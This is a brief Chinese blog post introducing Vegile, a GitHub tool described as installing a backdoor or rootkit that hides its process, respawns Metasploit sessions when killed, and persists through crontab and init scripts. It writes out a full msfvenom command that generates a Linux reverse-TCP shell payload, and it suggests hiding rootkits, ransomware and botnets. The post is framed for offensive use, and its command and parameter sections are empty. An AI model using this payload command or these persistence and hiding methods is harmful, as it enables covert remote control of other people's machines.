本文最后更新于 2018年01月25日 16:15 可能会因为没有更新而失效。如已失效或需要修正,请留言!

GitHub开源的项目Vegile

原理

这个工具将会设置你的后门/rootkit,它将隐藏你的spesisifc进程,在metasploit中无限制地产生会话,并且这一过程是透明的。后门即使被杀,也会重新运行。在运行另一个进程时总会有一个过程在待命,所以我们可以认为这个过程是不可改变的,就像“shell中的鬼”

  • 现在我将使用msf命令中的reverse_shell来测试后门,我的后门针对的是linux,你也可以使用thefatrat创建一个简单的后门。
  • msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
  • 对于隐藏你可以使用rootkits,backdoor,ransom and botnet(脚本,python,perl,exe或者binary)
  • 为了获得持久性,你可以使用crontab和xinit.d进入你的后门

命令

先拉取项目

参数

喜欢这篇文章的话就点一点喜欢吧!